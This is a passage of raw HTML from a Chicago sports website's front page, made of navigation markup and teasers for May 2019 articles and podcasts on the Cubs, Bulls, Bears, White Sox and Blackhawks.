id="menu-item-15447" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15447"><a href="https://theloopsports.com/category/cubs/">Cubs</a></li> <li id="menu-item-15452" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15452"><a href="https://theloopsports.com/category/ncaa/">NCAA</a></li> <li id="menu-item-2915" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2915"><a href="https://theloopsports.com/category/white-sox/">White Sox</a></li> <li id="menu-item-28142" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28142"><a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/">TLS Podcasts</a></li> <li id="menu-item-47870" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47870"><a href="https://theloopsports.com/the-chalk/">The Chalk</a></li> <li id="menu-item-44839" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-44839"><a href="https://theloopsports.com/mkf/">MKF</a></li> </ul> </nav><!-- .main-navigation --> <button id="search-open" class="search-open search-btn"><span>Search</span></button> <div class="desktop-search"> <form role="search" method="get" class="search-form" action="https://theloopsports.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form> </div><!-- end .desktop-search --> </div><!-- .site-header-content --> <div class="sticky-header hidden" aria-hidden="true"> <button id="overlay-open-sticky" class="overlay-open overlay-btn"><span>Menu</span></button> <button id="search-open-sticky" class="search-open search-btn"><span>Search</span></button> <div class="custom-logo-wrap"> <a href="https://theloopsports.com/" class="custom-logo-link" rel="home"><img width="520" height="236" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=520%2C236&amp;ssl=1" class="custom-logo" alt="The Loop Sports" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?w=520&amp;ssl=1 520w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?resize=150%2C68&amp;ssl=1 150w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?resize=300%2C136&amp;ssl=1 300w" sizes="(max-width: 520px) 100vw, 520px" data-attachment-id="43002" data-permalink="https://theloopsports.com/cropped-img_0256-jpg/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=520%2C236&amp;ssl=1" data-orig-size="520,236" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="cropped-IMG_0256.jpg" data-image-description="&lt;p&gt;https://theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg&lt;/p&gt; " data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=300%2C136&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/10/cropped-IMG_0256.jpg?fit=520%2C236&amp;ssl=1" /></a> </div><!-- end .custom-logo-wrap --> <nav class="jetpack-social-navigation jetpack-social-navigation-genericons" role="navigation" aria-label="Social Links Menu"> <div class="menu-social-media-container"><ul id="menu-social-media-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheLoopSports"><span class="screen-reader-text">Facebook</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheLoop_Sports"><span class="screen-reader-text">Twitter</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18"><a href="https://www.instagram.com/theloopsports/"><span class="screen-reader-text">Instagram</span></a></li> </ul></div> </nav><!-- .jetpack-social-navigation --> </div><!-- end .sticky-header --> <div class="inner-offcanvas-wrap"> <div class="close-btn-wrap"> <button id="overlay-close" class="overlay-btn"><span>Close</span></button> </div><!-- end .close-btn-wrap --> <div class="mobile-search"> <form role="search" method="get" class="search-form" action="https://theloopsports.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form> </div><!-- end .mobile-search --> <nav class="jetpack-social-navigation jetpack-social-navigation-genericons" role="navigation" aria-label="Social Links Menu"> <div class="menu-social-media-container"><ul id="menu-social-media-2" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheLoopSports"><span class="screen-reader-text">Facebook</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheLoop_Sports"><span class="screen-reader-text">Twitter</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18"><a href="https://www.instagram.com/theloopsports/"><span class="screen-reader-text">Instagram</span></a></li> </ul></div> </nav><!-- .jetpack-social-navigation --> <nav id="overlay-nav" class="main-nav cf" role="navigation"> <ul id="menu-categories-1" class="menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15448"><a href="https://theloopsports.com/category/bears/">Bears</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15449"><a href="https://theloopsports.com/category/blackhawks/">Blackhawks</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15450"><a href="https://theloopsports.com/category/bulls/">Bulls</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15447"><a href="https://theloopsports.com/category/cubs/">Cubs</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15452"><a href="https://theloopsports.com/category/ncaa/">NCAA</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2915"><a href="https://theloopsports.com/category/white-sox/">White Sox</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28142"><a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/">TLS Podcasts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-47870"><a href="https://theloopsports.com/the-chalk/">The Chalk</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-44839"><a href="https://theloopsports.com/mkf/">MKF</a></li> </ul> </nav><!-- .main-navigation --> </div><!-- end .desktop-offcanvas-wrap --> </header><!-- end #masthead --> <div class="featured-content cf"> <div class="featured-slider cf"> <article id="post-48606" class="cf post-48606 post type-post status-publish format-standard has-post-thumbnail hentry category-cubs category-game-story tag-albert-almora tag-anthony-rizzo tag-kyle-schwarber tag-sonny-gray tag-yasiel-puig tag-yu-darvish"> <div class="entry-thumbnail"><a href="https://theloopsports.com/2019/05/15/reds-defeat-cubs-extra-innings/"><img width="954" height="530" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?resize=954%2C530&amp;ssl=1" class="attachment-nikau-featured size-nikau-featured wp-post-image" alt="Cubs" data-attachment-id="46293" data-permalink="https://theloopsports.com/2019/03/30/cubs-mvp-baez-bryant/screen-shot-2019-02-20-at-10-43-27-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?fit=954%2C714&amp;ssl=1" data-orig-size="954,714" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Cubs" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?fit=300%2C225&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?fit=950%2C711&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> <a href="https://theloopsports.com/category/game-story/" rel="category tag">Game Story</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/15/reds-defeat-cubs-extra-innings/" rel="bookmark">Cubs Blow Late Lead, Reds win 6-5 in 10 Innings.</a></h2> </header><!-- end .entry-header --> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/ajbloomberg/">Austin Bloomberg</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/15/reds-defeat-cubs-extra-innings/">May 15, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/15/reds-defeat-cubs-extra-innings/#respond"><span class="screen-reader-text">Comments</span>0</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> </div><!-- .meta-main-wrap --> </article><!-- end post -48606 --> <article id="post-48600" class="cf post-48600 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bulls category-tlspodcasts tag-chicago-bulls tag-podcast tag-tls-podcast"> <div class="entry-thumbnail"><a href="https://theloopsports.com/2019/05/14/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-3-instant-reaction-bulls-get-7th-pick-in-draft-lottery/"><img width="1440" height="530" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1440%2C530&amp;ssl=1" class="attachment-nikau-featured size-nikau-featured wp-post-image" alt="" data-attachment-id="48172" data-permalink="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/the-loop-on-hoops-logo/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=1926%2C1414&amp;ssl=1" data-orig-size="1926,1414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The Loop on Hoops Logo" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=300%2C220&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=950%2C698&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/14/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-3-instant-reaction-bulls-get-7th-pick-in-draft-lottery/" rel="bookmark">The Loop On Hoops Bulls Podcast 🏀: Ep. 3 – Instant Reaction: Bulls Get 7th Pick in Draft Lottery</a></h2> </header><!-- end .entry-header --> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/nickpetroshag/">Nick Petrusevski</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/14/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-3-instant-reaction-bulls-get-7th-pick-in-draft-lottery/">May 14, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/14/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-3-instant-reaction-bulls-get-7th-pick-in-draft-lottery/#respond"><span class="screen-reader-text">Comments</span>0</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> </div><!-- .meta-main-wrap --> </article><!-- end post -48600 --> <article id="post-48545" class="cf post-48545 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears tag-chicago-bears"> <div class="entry-thumbnail"><a href="https://theloopsports.com/2019/05/14/bears-did-the-vikings-draft-enough-help-for-kirk-cousins/"><img width="1338" height="530" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1338%2C530&amp;ssl=1" class="attachment-nikau-featured size-nikau-featured wp-post-image" alt="" data-attachment-id="45974" data-permalink="https://theloopsports.com/screen-shot-2019-02-15-at-8-16-43-pm/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=1338%2C826&amp;ssl=1" data-orig-size="1338,826" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=300%2C185&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=950%2C586&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/14/bears-did-the-vikings-draft-enough-help-for-kirk-cousins/" rel="bookmark">Bears: Did the Vikings Draft Enough Help for Kirk Cousins?</a></h2> </header><!-- end .entry-header --> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/tomk/">Thomas Kavanaugh</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/14/bears-did-the-vikings-draft-enough-help-for-kirk-cousins/">May 14, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/14/bears-did-the-vikings-draft-enough-help-for-kirk-cousins/#respond"><span class="screen-reader-text">Comments</span>0</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> </div><!-- .meta-main-wrap --> </article><!-- end post -48545 --> <article id="post-48559" class="cf post-48559 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-white-sox tag-chicago-white-sox tag-lucas-giolito"> <div class="entry-thumbnail"><a href="https://theloopsports.com/2019/05/14/white-sox-the-2019-version-of-lucas-giolito-looks-promising/"><img width="950" height="530" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.38-PM.png?resize=950%2C530&amp;ssl=1" class="attachment-nikau-featured size-nikau-featured wp-post-image" alt="" data-attachment-id="46292" data-permalink="https://theloopsports.com/screen-shot-2019-02-20-at-10-43-38-pm/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.38-PM.png?fit=950%2C712&amp;ssl=1" data-orig-size="950,712" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="White Sox" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.38-PM.png?fit=300%2C225&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.38-PM.png?fit=950%2C712&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/white-sox/" rel="category tag">White Sox</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/14/white-sox-the-2019-version-of-lucas-giolito-looks-promising/" rel="bookmark">White Sox: The 2019 Version of Lucas Giolito Looks Promising</a></h2> </header><!-- end .entry-header --> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/dpartipilo/">Dominic Partipilo</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/14/white-sox-the-2019-version-of-lucas-giolito-looks-promising/">May 14, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/14/white-sox-the-2019-version-of-lucas-giolito-looks-promising/#respond"><span class="screen-reader-text">Comments</span>0</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> </div><!-- .meta-main-wrap --> </article><!-- end post -48559 --> <article id="post-48563" class="cf post-48563 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-cubs tag-chicago-cubs tag-jon-lester tag-mlb"> <div class="entry-thumbnail"><a href="https://theloopsports.com/2019/05/14/cubs-jon-lesters-cutter/"><img width="954" height="530" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?resize=954%2C530&amp;ssl=1" class="attachment-nikau-featured size-nikau-featured wp-post-image" alt="Cubs" data-attachment-id="46293" data-permalink="https://theloopsports.com/2019/03/30/cubs-mvp-baez-bryant/screen-shot-2019-02-20-at-10-43-27-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?fit=954%2C714&amp;ssl=1" data-orig-size="954,714" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Cubs" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?fit=300%2C225&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.43.27-PM.png?fit=950%2C711&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/14/cubs-jon-lesters-cutter/" rel="bookmark">Cubs: Jon Lester&#8217;s Cutter Paves Way for Success in 2019</a></h2> </header><!-- end .entry-header --> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/dannyd52/">Daniel Shepard</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/14/cubs-jon-lesters-cutter/">May 14, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/14/cubs-jon-lesters-cutter/#respond"><span class="screen-reader-text">Comments</span>0</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> </div><!-- .meta-main-wrap --> </article><!-- end post -48563 --> <article id="post-48554" class="cf post-48554 post type-post status-publish format-standard has-post-thumbnail hentry category-typical-chicago-fans tag-chicago-bulls tag-chicago-cubs tag-chicago-white-sox tag-nhl"> <div class="entry-thumbnail"><a href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/"><img width="1440" height="530" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?resize=1440%2C530&amp;ssl=1" class="attachment-nikau-featured size-nikau-featured wp-post-image" alt="" data-attachment-id="41572" data-permalink="https://theloopsports.com/2018/09/13/typical-chicago-fan-a-casual-fans-take-at-the-loop-sports/newtcf_edited/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Typical Chicago Fans TCF Podcast" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/09/NEWtcf_edited.jpg?fit=950%2C950&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/podcastsandvideo/typical-chicago-fans/" rel="category tag">Typical Chicago Fans</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/" rel="bookmark">LISTEN &#8211; Typical Chicago Fans Podcast 🔊: Return To The Content Cave, Cubs Media Talk, Bulls Draft Lottery Thoughts, and MUCH more!</a></h2> </header><!-- end .entry-header --> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/zlil95/">zlil95</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/">May 13, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/13/listen-typical-chicago-fans-podcast-%f0%9f%94%8a-return-to-the-content-cave-cubs-media-talk-bulls-draft-lottery-thoughts-and-much-more/#respond"><span class="screen-reader-text">Comments</span>0</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> </div><!-- .meta-main-wrap --> </article><!-- end post -48554 --> </div><!-- end .featured-slider --> </div><!-- #featured-content .featured-content --> </div> <section id="front-section-one" class="front-section cf"> <h3 class="front-section-title">Featured Stories<span><a class="all-posts-link" href="https://theloopsports.com/category/editorials/">See all posts</a></span></h3> <div class="section-one-column-one"> <article id="post-48539" class="post-48539 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-blackhawks category-editorials tag-chicago-blackhawks tag-editorials"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/"><img width="1260" height="709" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=1260%2C709&amp;ssl=1" class="attachment-nikau-front-big size-nikau-front-big wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?zoom=2&amp;resize=1260%2C709&amp;ssl=1 2520w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?zoom=3&amp;resize=1260%2C709&amp;ssl=1 3780w" sizes="(max-width: 1260px) 100vw, 1260px" data-attachment-id="47107" data-permalink="https://theloopsports.com/img_3519/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?fit=4032%2C3024&amp;ssl=1" data-orig-size="4032,3024" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;1.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 8 Plus&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1552331347&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;3.99&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.0083333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_3519" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?fit=300%2C225&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?fit=950%2C713&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/blackhawks/" rel="category tag">Blackhawks</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/" rel="bookmark">Blackhawks Prospect Report: Goalie Kevin Lankinen</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The Blackhawks goalie prospect Kevin Lankinen is turning heads with his performance for team Finland at Worlds. Finland had a<a class="more-link" href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/">Continue Reading</a></p> </div><!-- end .entry-summary --> <footer class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/juliakender/">juliakender</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/">May 13, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </footer><!-- end .entry-meta --> </article><!-- #post-## --> </div><!-- end .section-one-column-one --> <div class="section-one-column-two columns-wrap"> <article id="post-48516" class="post-48516 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bulls category-editorials tag-bulls tag-chicago-bulls tag-editorials tag-gar-forman tag-jim-boylen tag-john-paxson tag-michael-reinsdorf"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/05/10/boylen-extension-shows-how-out-of-touch-bulls-are-with-their-fans/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=1260%2C709&amp;ssl=1 1260w, 